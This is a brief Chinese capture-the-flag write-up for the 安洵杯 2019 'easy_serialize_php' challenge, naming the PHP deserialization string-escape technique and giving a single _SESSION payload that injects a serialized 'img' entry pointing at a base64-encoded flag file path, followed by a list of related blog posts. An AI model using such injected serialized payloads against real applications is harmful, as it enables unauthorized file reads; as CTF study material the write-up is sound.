[安洵杯 2019]easy_serialize_php

原理

反序列化字符串逃逸

解题过程

跟sql拼接差不多

_SESSION['imgflagphp']=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

参考文章：https://blog.csdn.net/weixin_52585514/article/details/124291588
https://xz.aliyun.com/t/9895

本栏目推荐文章
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• [Keyence2019] Paper Cutting
• Windows Server 2016 & 2019 工作站速配脚本
• CGI、FastCGI和PHP-FPM的关系
• 洛谷 P5359 [SDOI2019] 染色
• 板刷 2019~？的省选题
• Linux更新PHP版本
• [GXYCTF2019]BabyUpload
• [极客大挑战 2019]Secret File 1